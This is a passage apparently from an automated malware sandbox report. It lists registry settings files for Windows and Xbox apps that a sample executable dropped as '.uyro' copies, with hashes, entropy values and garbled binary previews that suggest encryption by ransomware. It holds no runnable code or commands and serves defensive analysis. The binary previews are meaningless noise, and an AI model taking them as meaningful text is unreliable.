/..z..`_G..4.F.....ap._.=3..i.GO@...p\..Q1.1.....O.&.mnha287.K.G..I.j.2s.0...b..5^.h.7.Z.9I...5...n.Wd.Q.`....P..-z\|....#..I{.;._..HEzO...$........!)5..Wi...

C:\Users\user\Local Settings\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979038839491481
Encrypted:	false
SSDEEP:	192:4NMzSsGIYDP7V6hBQ2wDZCQiaiNFVKaVtnJ9YxHOv+w:Hz9GI+jYKDt2NiaVtnfhv+w
MD5:	F43E3A8082B1296FDAB06596855EB048
SHA1:	2CBA8FB1F83E3A9B9F8AA3075EE1D0ACC5574FF7
SHA-256:	760B0C89B0192C5699CB8D50C234CE2F502B1F8CB74DC0D69EB1B029C3B06BCD
SHA-512:	84DCEF029750A546EAEFAE8D64EC3883716873347A70409EA9FADEF455A05CCB3D3D6AA4C99206C9ECC348FD3262D55DE7B818C879964D5DB80FC9B37DC057E6
Malicious:	false
Reputation:	unknown
Preview:	regf.....Y..V.WTXX.K..Ccw....r...>..O]..Y0.1......#f%.n...~...............v.WN.....tCb....U.%[.Q.4g..fDw{{....-.l..n.U....c.....,pEt^(..2.L..3.g.a...v.pb.........Q......\|m..K..l.#..'..j..N?.$.#j.:f..>...~.r.c.j.T3..U8...#]....@......<..i@.5..1\$...q...q..:EY.]...1.>C.YT...S.bo.'..#...Q.....C.{.[}.Yy.iB,]..B...0.Jt.3n3c...5....b.o..(..D.!J...9.pl..6.).\|].d.85...hU.o..o.2.Dd..v.........$.Ck...a..y....yr......&..5.]mM....b..A..{.1...yE..I7lx....a....^x..]K....=......o.]./..T.......}.SN../.D._...w.j...g.D...Q{[.i.Q.X..N&....c........Q?.ZT.VT.....X%P...p..b.-MA..;.g....<..sR.....xc;....2.......o#...$u....k.....o.I..o?M(FbR.....b/.gv.=\..5K\M..ac......E..a.l....\9.5..Hi.........@...u.p.....i#.0....(...ix....7...`..p.9...]..&.$..(...m..\l....(... .w.).{...=..lR.'Z...gDsz..H.Z.f\|....T......eu.... .0...)$....Y....OV^..wVh.m..G.`@.R.7. .U.....'..\|.OR...a.5..2.E......-r$k...W.\..9.+Z...v.'.U..... ....F.&m[..{u5...C&...Y.$...2.H....Ss.X.z....lJ

C:\Users\user\Local Settings\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978352500364524
Encrypted:	false
SSDEEP:	192:TZg9bZFgVjQAxaFwAm31RlV2rvMWbjobuT5D31mw6:9OEM9qR3f2rUWbsbAN1mw6
MD5:	C88C54E52026926B5227B62B1FA474C3
SHA1:	691101DD5405A01B525DC7D8E8C8B4721D883C02
SHA-256:	7EDC4EF12A74AC76E353D7C5A5BB4A025FA56FB17D2B41194B94788991E943E7
SHA-512:	7F7AE08A574FF78AB8B919AED05B8265D41D07923875502A56B78DBF0CD3B5257E5187BAEE44E1BF6C6D7EFA585D407B94010BC24923E69742FB9A42546D01BF
Malicious:	false
Reputation:	unknown
Preview:	regf..T.]CX.ts.U............$w.p.. !...^.4`.Y.qd.H.95..,.+A.rg(.L.gx/.v.V..._.-i.=.b..y.Z.4..#.8.Quy2...l....}1YM..7..W......o..>m.a..^.)...[.><....+..94e.("...OQ.+..>Sc(..cp..k.../..Br.x.7d......t+.e.39.F.ZW..s.2...b.g.W4..z VS._.SP.....w....A.c.Z...$...!.a.&......^.9......Q..r. ....p...v.k..X=;.'..]...=.)Mf_..sr.3.oN..B......).U.Xk.R.......?F.......U..../.y....K.I!].......e...-..)HB..e.q.A.gy..:6;...........{...............-.3y-....1i...f..HY.............h.#?...zqC.MK.z...!.3.L!..s...%.jT...........%.<.8....7...i.z.Q.....z+..k......7.....s...s.O.....8b-.@\..,.~R._c..H...4....7u......h&...2......s..99.1.>R".n...8w..@..}....H:.0".....vgm..o...C.os,6...L...<...5.U....i.O.........1g..K%.q.......=W.O..,.K{..v...0q....R.........$.."...y.>-RS......5..}.3SVD....;..z..i. .-S...xGr..a...W....kn...m.J.....z........b...G...JT7...e.....(..M.=NJ..RI........GW.....s....M).}2.......D.\|.z4.A...A...d....&@t..W.G..#.Q...uT....u.......M..i.Z.^..\'...

C:\Users\user\Local Settings\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978005993683504
Encrypted:	false
SSDEEP:	192:itjPu7MQqTiHVx+ruqXFTJ0GMbMFQTUSG9Cx9qpxkZt1tXAMZUPaw:AjPu7MQqTif/qqbxTSrpxkZtj30v
MD5:	195473D9E1888876B2227F0A991BA2BD
SHA1:	9760FDD2D8773BB1C2763B5F53E97B01E9EEBDD9
SHA-256:	B5411816A1F4408BA43DECC3E27EE5AECE7CCB5089F3B624F417E21B0473C7DE
SHA-512:	35990B2214E37210687152730972A3881EDC17C7F7CC05CF2B4DF508BECA0E7DB9DBB374AA2DD0CD03A4E846CF34CF65045E2B2687F3791503D0182D74AB61C3
Malicious:	false
Reputation:	unknown
Preview:	regf.t...Q.A...].eL.'9r..r......'.$k..Y..i....u..n4. -..0......$..1.F ...>.W....r9.+..[._oT.........T..9~.ec..-..<Co.....P.M.[..fX.....Q3....ny.28G,..'w..`.....-.-^...{..`H..(;G..?..)w..WH.hm.t'.&...j.....?.M3.../g...l....,.......z..R.<..r).p.a..C..A.p..`5v....p..g.th0/SV..U.......&...]{.8..aw.9.>..\E7.q..,..N.8"..hb^`-.......7.q y.....~.....qq_c@.1.}.<..-.......OB.V..&s\.{.R.s.......:mq...%.."....4[......f.p.XHp,..d.zf...........'G.[.o3.mf..\...k,p.C.].X.#...O..1...jC..Q..g0........j....F.Q.O..r..?EA.~.W`.Y.....).H.1....`........i.3k....5.....Fsc.r.7~.....C././S.7Rx.Ig.c...NY...(....fAG[.,R.."............[~S..WM\...0....t.o$.\|...G...e..BB LY_I/. ....d.R.......fr.[p.?..m....@:)j...C[.D?.$..f%.O.w...c%.......H{..C.r.At&q!0{\..^.......s.dg..T..Zo.....,..;.d.'.\|..0......._H......OD.U.Q..d..*94.m..&.2.M..W..\W..&.\.8......+ZbY0.,..>.@(G.....9X.."E. ...R..L...B.....{.s..L...zO...W"...t...}.f.9'...E........Y....a.R...a.J2M'b..qn.....BG.NV<L

C:\Users\user\Local Settings\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.987846929979347
Encrypted:	false
SSDEEP:	384:e0rdWUY5FVhIqLcbk0BydxG7R6qIJ/qqHehzQGfXaFkfYPaeSETShcT:eqWUY5FVmqLcbk0BydeoqFnSFxX2hk
MD5:	0563E2C11A485FDBB2CE1D67ADCAAC99
SHA1:	8FC7186A931ADF344DCAADC2D9BF705D81A099EC
SHA-256:	E778706BD6ECF85C07F0D774447EE5F9BCCE93B81BFDF91E16E42A9DE475DBB0
SHA-512:	419A0072662393E960A38503B204819BC8A3A2C9C1FA5ADC1EDC7BF64629E1F534568C4D46D346667A099ED193C3502E466630E954A5BD0E2FEC4DDF6CB8EDDC
Malicious:	false
Reputation:	unknown
Preview:	regf... )t.m.f9..^s.>..Z..s.x@......y..D7....Gex..+..M..@LH(..@..e`.8U..>.,..'.:....R&v.....&F.....]`BDf....>aD..+......w.$.o..1..\f0.....N................Y..Q...B.FYVV.8..~K...._..V......).F....'Q @.!..(..}'...T..<..+,...N...4...Xl.7Y;.HFyU.....nRX]...>...rE._Hh...,..<..DY....j....9....]....S51....dL7......Q.F..s.j..b....h...T.....?.g)..)9-V.Vi..~RUN..O.W........Yo.0sB.H..O..@..O..6.n5 ...sXx..E.!.11.l'...?. Y^..e,.0f .k.,G......@T:T?.x..6....o. .X<........~{..a.B~{I...!3....z..d..l9...B(.'...XWx...'..(.a....4...Z....p........q.B....{.a.E...#C8.U.K:......;<.Kt.2....!.a....K.x....yjl.u.....\|......%...6_.?........_......E.....(.T..y..).%]8}\...YR.-.q.VF..!....Z%.6x.'!.'....x.UC..N......T...s].....y.f._.}.d1.,.Cj..r-x;eYG<.=d(..m4h.p.p..^..&NY.+..%.V.....!,.%..Ka....6.;.5..a....z....e.U.e..:....n......68w..}2.6....d.]....%z@I.8G.Wb..5.....8l..j.."..S(0]...-l$^..B.\|-g.{C.[c.R.C.:EP.......eYq7.....r...Rb+N....\7.@.A..(....p.[....

C:\Users\user\Local Settings\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980040884037454
Encrypted:	false
SSDEEP:	192:E6Or32BEdMLx+i9BY2un/V0AwEIpPeHDdFKz/HIzt:VxhL0iGn/yAw9PeHD7M/HIzt
MD5:	B2410BF93294F08D62FA47478D804DA3
SHA1:	19230D489F1695BA25050686511106AD97EAFD60
SHA-256:	63D7DC2CFB443FD721D8A4FC9A445BF5211608E77A59E7D9F15A42B396526A37
SHA-512:	715778876E42B5B867B54ED7E5EC7AA54BAC12D2F488E72FA2FF6070C7863C7192AD997E93E1643C7632B959470523B65B35CC92E7D077D63722E3B74BABC03D
Malicious:	false
Reputation:	unknown
Preview:	regf.w...."<m'.{..%;...D.B....(7..u..:y.d.......}.:..;...T.j1!._.:..#........]~...].m..?Q.o9.d..@..J.9e..."C..jV...........,9..H.n...F#E.........Gg.A']7......E....R.C.........>..`..P.........G...M6..@..-X7......IJ^L.&0..6..qn...o.X..r..O=..........Tt.6...........V&.BJ...]mS.h.s..K.e...T...9T'+..f).......:H4.&.j?..vZ...mk..%Z.!...........(.`.S...I..>..v.EV.a..0Ia.@...i ..I.1..\.5.=.0...l....52..'.r.......;....[...9...2..l.]~..... MT6Z.,d.S....y!.U.F:`q.Z."..5.R.7....u..I....K.p.CS......... ..Y5.....Y.O...n...\|id......&\|.1...7.^M.XE....;.../{.g1.....J;Gf..Vb...v?MMo_.....p..Y....Y.7..z33.}....@.).6^.D.(.V>w.....r............t.Z.2.. yC...........H+D.x(..R3..)..`..;..r...b-.eD......}.u....Z... S..u....R.]...D...qA.......&J.b\|S.../....Q.....nG"&..Yc..Eo....48jb..JF.P.5.P.w........W.W.MD.q...c..lqFsZ.C.a.;.Q..L..4.Z..m.(~.XY......"..X..K.@.<W.J.j...G..WB?..;..R......E....0..R..Y...\|B.6.5=+_...3..V.qpoNd...?a)G.=.W.6....hQI.H33.G......a..\|G....)1.&.z.Gc

C:\Users\user\Local Settings\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980427809869788
Encrypted:	false
SSDEEP:	192:y6WbPclEQ45k+HIRXbYcZMUjW31Er4PbNAp8WQdIsyx/Cp:QP9Q4S+H84Er4PyGbIDMp
MD5:	4C980CB071055A75D2DD7C190A683C1C
SHA1:	134A46F994417601D6E4FBF48BD28F914E891BC6
SHA-256:	2D0ECACCBD8A84B1A540F6B8893205179EE587CFEA3106A7AD1196F48E6274AE
SHA-512:	4500C5015805ABA2A8329C5010ABA58F9DE8DE567DB9DC4992742FF6EDAC496B48A74C91AF5E30F60F6BB803D6E80E937653A5B2D73034072382A38D6A6D9793
Malicious:	false
Reputation:	unknown
Preview:	regf...d\|....`.:...g&0.1..V,..>.H5...Dg.Jh..Hb..(...`2.......X].y.%.yZ.r[\|M....aRCI.)?S.&t <.6..\A-...h5}.....4./d!..j.z....JbH..2q.....C...b.......}N.Q..z......e.}.@.vx..6.h.,.D.^5..p..y6.Z.x...FM..g......_I.....2.t.V).pb..-.....j..^.u..k..9.....xs.O..>V..w.....lW.E\...}.<...g?.=..F.9..}O.!..........X....-..c.......L..iJ.>..4.<.......e..6}s..&..i3X..j3R7..TB....0a.. ...\_...N.t....#0.@.P....R;t.....kj.{4..U.6..y.^.../....Q.1t..FM.M9.....O>. v....].wh.9~!..F........]x.....'x.,.$[_...... ....ZA....#!..c..dA..5.M.zxx\|.+..q.:.$.tm........{...C..].@..^^0..-...m....(..>.....~...i.&...!^6~%.-..i.tx.H..k!\.U.8I.8..mh..f/......(..,....J..1..\N...1.....p\W.n..8......%...#..e.!..9.....+..;..YT...,..2Y...j2.-...(7..%4..(...5.ri.`QX.1...i...Phj..-..t.{.X.(..$Vse$x.:S..EX...)>..i.. r.. ..J.......N5..L.k.0.........-,.@.U#.`.:..z......XW.C,.iv.=...-\..cJv..h]...~2........>...MT........$..^...........@...d...........l.C.f..u..&a.....<..n..`EB."x7....1

C:\Users\user\Local Settings\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979152848664836
Encrypted:	false
SSDEEP:	192:uoXM+4aoQoUcv0kAm95VZzlf0Ol9dpzG7EKEnabqgUoqn33:uGMvaab8k7hZzh0OrpzG7yndou33
MD5:	1B1C892CC0E137330361555A0207916E
SHA1:	D5B26B12348C2B931AF0B66EC60CC88241EBEA18
SHA-256:	CA01B7688098CDDC2B942C26F30BB28A492B10FC813206099A769477914C4E6F
SHA-512:	33965E54967567408D16F6917146E78E9ACBD5A9178371DBAC29DF1DCE0B2A6F945FB3BDF2B85C762B4EB76BD5304CA49E1B54D043B13372F7DC2150140E5C08
Malicious:	false
Reputation:	unknown
Preview:	regf...]y.R......$$B..w..#o..21..,..^yw..].>.,.X{}....6..i......&_T......kp.....<..A........Hc\|...}.rK}.7.....3.....?=...f&.........H..?.Gr.e,DR\..'L=X....c.....U..Zg._ .]...l.dR@U...=5lY\...T.P.=.-.{..V.o.....=^..}oe..Wf{..:.u.[T.RT.9-x9...7.y..fb.}>......d.....N.L..Di.O.@gT.....b..W...U........6G.L....m..<.&VQH....G9,1.4.Cn..:.+.Q.....G.[z...Q9Q?....k-....m.hm..@...>%...v...cy....R.."x..mL.b....x....tr....G..?q.......r.w.4#."`....aC..r........7,cF..Z?.<V.....S.#.7z).IV.a...y....X..?.l@..=.A...9.U....(.K.V.oyk..[Q....`.gEM...G.....t...0..c....jNx....d..&.GP..E....a..\......?.[q......1...\|<..).wNv..g)...c...j:.8..4....]..y.).......#.Vfl..[.UZ....p(.Kv..`t.W..t.d..../.s..,....C...:Ak.3.n..ndL..........,...C8.Y.C...e./..,...=.Y.il..N....\|9....W=.t..s.z.Mh.?..9..$.ud.3...'.-V.7\|'.:P....N7..`vT.....P'....0.1........&L..6.Eg@....C/....T...O............=...kT..K.k...?M.. .r.H.4M..r......:.u.K..7..]f4:{.-..Gvj./........dp..p6..E...}...

C:\Users\user\Local Settings\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978914726426402
Encrypted:	false
SSDEEP:	192:38O9udFPCroFzlDz0O2F0+FdeH4HMMHoEweTK/B6ltQxNYv3nc:38Cu6roFyiKdeHlMfQxKnc
MD5:	070B5DC387D5E1DB018C15E846C644F0
SHA1:	C227EBDF8D7990C405F15080D75760EE81FA402D
SHA-256:	C25C7939B376B5A498DE9AA69D893DA4D87A74A8E8259562927176B2FB367CBD
SHA-512:	52CDB8389E7F1D49A32C2D36E2AB679681DD94D4646EEB4DAD9139B06FF7F79A8D9131C9C0321E5D90A32E691275AE7B5BA6528E9F0C07A3352B1654011E8B9E
Malicious:	false
Reputation:	unknown
Preview:	regf...]!:Y.........s...#........YV2\|..d<..b....e..V.....l8:w.SX.R7..7.!.`..h.Z).}+..)..S.$( ....AK...m\|...,qC..3.(..Dv.o ....>\..YC..j..j%F.u.L..}......Ax..R.Pw...L....N].W.].R...P1...$.4...8...}.Zi)...z.....N.M....[._.v...u...Ap_3....A.w..7{.TmG.<1.#..{...kv..M/_..A../......8].2..yN ...X...m.6..U..4..3.q..s.8.....d3.......{. Q.....y....-.V.!.c<g.W..5..d8E.0p..k@t....Q.g....R..7!......g....$u...h.z.p.F..=P.k..x.x..?./....h[W_=mF..R.(.kZqRu..[.NL....u.!.k.../ .x..U....Y...C.@..1...^r.=.JW...?2.H,...J.x.'..\.BD..P.......W`m.....O..+Z.Q.E..h.=b............w..<.A.9..PF....-%...u..}.`...3d...\|..R.<.~x..>....e.-@..i........r......7.....Y....dZ.....'w...~sv....fSG.TJ.U o..O.....F.7..;..T.n...3%"o.,/.IA..X.CX..5.E .....H\..].O..S]..u/....+kX.m. Wu.B.B..r.....V4f=K......C......w.b.i../.W6..Y?!...r..:.1.eq.>..C..*"9.?.O.h..T........N....BP...w.........0%Y.mOyK:...&..D.s.q.yT-.K..c4-HUf6...Z.Wl.,..10..>.c.......)~....+V..X...c.ML..6...!.C98_3..)V....

C:\Users\user\Local Settings\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978948735271836
Encrypted:	false
SSDEEP:	192:9SnGsA2NiN5qtaA9MvxOZYFYctrnmsh2Q0f:9ajAAiN57vI6b6Q0f
MD5:	9627D4ACAAC1A9F9E9F1FEE1AF60A9B4
SHA1:	E46471097C210C9556E3FF1B985A9BFA43D873BD
SHA-256:	80EE23E3A5A5B535FA9CA77DE88F1B7BDE853FA8665D0D9CD10C0108AECC87C0
SHA-512:	793BC65121EDF8DBAADB331A5E0279CEFFAAFD34AFC9BE446C4022AC0175F0971710128C1A07F00A335093A07FA4C2770A06F3E639586C3EA155E24980AA72D7
Malicious:	false
Reputation:	unknown
Preview:	regf......k..1...\bY..>...(._..d.<9.z..d.\|.i....b....F-......Y.6yd......2.....J;.u.`.FN...S.....9?...g......\|..AK.....S..Xh.._..S.J...>.k..o6^E.Z..V....W.;.+@....?.v.uD..v..O>...D.UN.g.J.....K.......L$..B..04s.H...L1.%.#.&.Q..qG.'..x.....q.g..@H..%..C.g.\|5.6...9@,..........l4..dg.g..;..;..-...uw..3.....b{.5.#.`_.4...X..x...$..p..$..m.T..1\|.u..e...-=9..^..f.\.vJ.G.GT.c...x.?.0u.9.R.P.......!.%(8y.yV. O..#[AM.H..`!..#P..N=....pow2]iN.)\.=2&.-...5..j........LB..O......x.I+...C..ZK.a......o....}...L.O@....aV_!.w...".6..E.{.R.......B-..eY..>.h..(..T+.%...i.:...yQ./XcN.....B..U...[....`.5g]._...<.Nxa.....F..2....tR.^.M....t.b.v..?fx.H?..R.....Q....G!UK....c)..pP?.B5<..B.Z..\K...M..n...N...-.]eq.q...SoA.x..Q.(..f..)......RF.).[xX...af..G(..S...Z.jN... ...Z(..!..h.8.`.(M.....D>52.@.E..k._3.e$.~.b..L..M.W...b.....\|.L.II<7}....f0t.T.....`...n...E..uG._...B..d..!...xI.@5.gr...=_..\D.'..Q%.......pX..!Y.y:Q....Z..".&......g.......G..h!....(.... i..M

C:\Users\user\Local Settings\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979023840975735
Encrypted:	false
SSDEEP:	192:bGnzGbPWiuxCCY+jTLr+HOn4Rwk/ZvnvoRMAvKw5P5C:azGbPWiuxvjTf+u4Rw4+bCk5C
MD5:	F5FC12C14D62C271AF37A73F22B188B4
SHA1:	DA0951DA663B4F7035827D82DB738680742054E1
SHA-256:	AD573A8A49A462DA092DBEFCC095D30EB5E6293D8C221E7217386A1015B11AC3
SHA-512:	DAEDC944DABE1D3C44B762296FF659FD6D11C898E78581D4FAF416BA6E7D18B00E4678C6FDD0AC126629A3481FF8FCCA101D339450A4A4603EC407892D72BDC0
Malicious:	false
Reputation:	unknown
Preview:	regf.....U.............).=.@....".a...Nf.....;.....@...d^7......HW..x...u....+t..#t.(.<.g.R...dT........M...S....K.wC.m.L.)2v..J..E...\.m..Ea...nV.%...../5...S.I..IX.R..zj......^..v.p..gWAqkl...-!.b....75q~GI.6.:..S..O...=;S3;./.N...A;l..\|,......h..[l..C.y..t......Zjp.)23i ..:..w.....p.\...S"w.....F..r.....s$#rN~j-Dn........_....ErW.'..D..O.5R......:.....w..QGWn.......p...eW_.-02.pTE.]...L...rk...n.\..'.....Wxyp..7:...o..C..Ju..Y*,(s..Be.[..'vS9.....o.............~...D.]#..6=.....ZY.Y2..e.B`.!]s.c.c..k3..n...9...... ...s.4cd....`DC.N.h+.D..YSt{..`....-.........%.a...oK....?2q.....o.8_Y.K....v..I..p,9..."....m}..E8...J.c\A<3....{.."...VK{.._.#WD[t...(....a6...@.v.["..2S.hS......V..`.[...?..b!.>....G.L.....~9.OR.&..hm.6.]y...$}.B.:.r...\|7\|...6c#.].W..h^@......a.S..D.Q%)m:.n..@..u..Q../.....J.6...1...~T...}.e..`...,.3.<.......;....-....I.[.l.....x...I../t.`.....^..pz...........<.....9s...1N...(....c...l$.%TJ....i....h.. ...(.g

C:\Users\user\Local Settings\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977002589571649
Encrypted:	false
SSDEEP:	192:XEhgcadnWFXN+Y+CeoWUpTsWvwrY2OMDAXw+IZk9d3xt:XEyJncUCe9Rqw+kKNn
MD5:	4FB69D12E6171319486C7CCB82CE532B
SHA1:	B1E303E2D4C87EDEFBBB94753CE1C49E3C197320
SHA-256:	A6D2D16ED33492B62F168ED9148510ABA3823AE9AC101F95484A1C056617373B
SHA-512:	550B4AC7FEE9FD2B796C3B2503ED496BB93BA34C20682F9D33CBD872EEA0918C18FDF08E4ECCE45AFDECC54C2293FDA5F29A59FB0BAE07748AF311B07567EDFE
Malicious:	false
Reputation:	unknown
Preview:	regf....}l.[...W.+@....YK.. .4...$..>....X.X\|...Z8x=....J.7(mG.....s.s...{w4.Y$18..Tn?}......,tGh>.....8#.qgJ.A]..~..9....J!...O.... ._.O.....J.+.."0.U.1..!AGo./....D.-........M...i.\-}NuZy...G.!.....R:\|Nh..c..ch$t.M4m.z..TS.$..8G]..........x..E....o./d.W........4.P.....6....\|YL.rj....K}C..D.i...t.5.sf..t@.......E..O.Hu.z...p.D...?..r..<.hNg..N..t......Pk..a.j}..B/.i..H..g..&$...g"+mE..R..........`..r.....;F...y..p.:kXI=<_\H...b.Tm"".........?.p$...k...=...q....B.r.....WqH......]e.BhM...[.0.....C.pj!r.....h......M^]=Ej...G.[....l,..?.R....Y...z[...Q.\|.v]c...t.I.D7.a...G..Th..U....).O..1M.k..........h....Y..Z.`....(D.E.2.....v.C6\J...)}.(M\]..../9.....).^...........)....k.........X.z:..mM...14..p.g..<)...?.. ...}....~.....WY.i..L1bFbi]bEX.Iy.p..{..J,..(lx.:q...^...)...t...m12...bR..{e...H..c......].nM..iP.u!.H1.....X9.... 5o.P=.........\|F....?[..b.c......k e.c~..;K`R.<...........@.[..k.\|CZ...3..C.*..N......XF..0U..G).z.._..

C:\Users\user\Local Settings\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.972034587365535
Encrypted:	false
SSDEEP:	192:ytFu288ugwGWRfA4uvQlv0mDw/drge8M+ZyhD1YZZYKlzhht:T86NK4uvQlv148XMAzZYKtt
MD5:	207E46EFC8825F24FB72D053EB1E03E9
SHA1:	EC7EBF7A0DD80D1E86151930F12B661B706C3087
SHA-256:	FAA535920529CF0A67524FD518404626BDDE3B47640B3B60C6EE774167CA16B3
SHA-512:	1937B343E4AD0C15F0335BF965C8B96795A2763FCCF8CCB1A6FD7DB97CF784E4C0EF9A41898212F5039E83C1A5BAD495447926951BBCE36F2F334F4B30F04778
Malicious:	false
Reputation:	unknown
Preview:	regf.:.d.......G.s.a..... Jo)..3cN.Tv....(r..<.....L..7...dl0.Fs..._...m.)z.36...4`.R!...<k.u....".q....}... .A/+.+.lG2>....K..py....bq.Dq.5zX.....,c... bJ..c.[@0.....ihk...#....\|...nK.m"."'E...,..f.6;y.d.s...v..d[.W..%Udm..`M...(..oa.c.....A.....u.x.Vf+.%..Nz....(....6...Fd.a...j.SjB..3W&...N.}[..D..~..k0.ub......n._.pjV}..G.......^...4Z...._j.i$....c}.`....xl./.s.m.K...+...g.+Y.~$...~....h....R....q.V.#..5.........s.]..........[U.F.%.....m\|."..J{.2.kL...c7..s...b...kv....p...C.....{..RYau>.....4\|NV..+[.,"n.y.,]Y..^!..u&-x.Y.r...Kl9.w....=...r\1W...z........k... .........i........J..G..._.....$j...Y.f.K8..Y....n....M.Bu..(......0...1#..Z..M.zK.0..7.......:.i.3(......0..WH.N^.zg...-..............z....f.....L].H.G..s..~...p..2...o.m.z...7mNM.(B.yX...~Mi.'...d.x.?........c4..Mh{!...}t2. .rLnO.Qg-7....y.D...Y..(..4..H........F..]......#...,T/......=......:Nj.(.........2<>.A......>...Q7...Z.v......v"./.....%............B9....E..l..om.s\.

C:\Users\user\Local Settings\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9798112637822
Encrypted:	false
SSDEEP:	192:BuEKkdaoKrvewG/TTxoSQk9h6Vbp73bP/cOh:f15aewGPx1QjVFvP/cw
MD5:	6725BDA38C33D0BD5D48458D0BB4BFF8
SHA1:	2DAA7B09253F8199D063F7477348D0E1A3612C78
SHA-256:	3D0678A5206A6249010CAD5464715423F5F18835781952EC0F983A1DA8252318
SHA-512:	3768A1C2AEAC9CD15019E39732A9FD3B219A2B4EDFE60BFE3FD70969DB1767D1E7CBEF4F6525D2D6424293E55BDDDF9443BA02CB9EE49F576F1DF3191CA6D6A7
Malicious:	false
Reputation:	unknown
Preview:	regf.......@.P.7"..X5..$..O1]..Y7!..v..Rt....2......T..b.....Vj.+..O..#.].)....y.k#.z.kEs......=....[1Y4.`...[C..~...S..?.-i.Ed..;.7..q-.G.$e......id..y-},.}E.^%.Jn..o:...c....Q.+=.tFE./.}N.x.....A>.v.~=..=...q..U{G...U..6.!......&C......`.d.o.U..v..._QQ..~{.5..Xr.v3.g{..'...~.....'..@2..%...J.....G..'-@y.....hvh.b.;n. i.......n...4.p...N.9............F.. DO..s.."9...!h7..R.......3.....b....A...aN..A..f....G.o.\....~#/Z.o.4..._.\|Y.4..../+....R..^.n.....mU..4Dex_.."l..F..).^........).......g+n........d.#.1...."'U06@..D..UB.-c.2.q."m...Bv..^IC...w+...h.3E._...zW,/r...ab>....//.m.......%z.M#.g.y.G.W.7...L.]..4.sF....... .._.:......."yo..N.[...H....U.....~.v...?>../l..z[....)_...NZ.k(f....DQ....&..K.Y.._W.mtQ....g.....1..C.k..JBBX.U..j.A.n...vA....8?f..........u...*.bpu..vdxk.......#YE......a...\|.@......<`...S..1o..d..z.$e....F..).rVl .0B....[yZ..O`{..8(.mZ.s...D.v...E.Z...@...\vNL..D/...N.v......z.....Q......?K...k..Q>z..XJ%Y.3.ec.J..p.s>....z.O.4..

C:\Users\user\Local Settings\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97972423658612
Encrypted:	false
SSDEEP:	192:lwNDKobT7QjxWCKoQfKTRc2z22Iq25iwteOLSNUdv:SNTbQRKjKT22/DsiROmWB
MD5:	C2C6D8D4F1C3F7C07BC1192C509785E4
SHA1:	5E8BE64398EFEA0E6D4453F613FA510D5CB34DDD
SHA-256:	4AEC28BE58E23B73668C530E3E66E3C35DDB34251168BA7003B7FE675FB446BA
SHA-512:	077E5AA79C0E8E11F526485C847DE5BAEDDD672AB7CDF6E017AF93D634FB8155131F793C2C6C3A7AA3ACED0C329E34BC51EE6FE469A454BA0539E76DAE90DD68
Malicious:	false
Reputation:	unknown
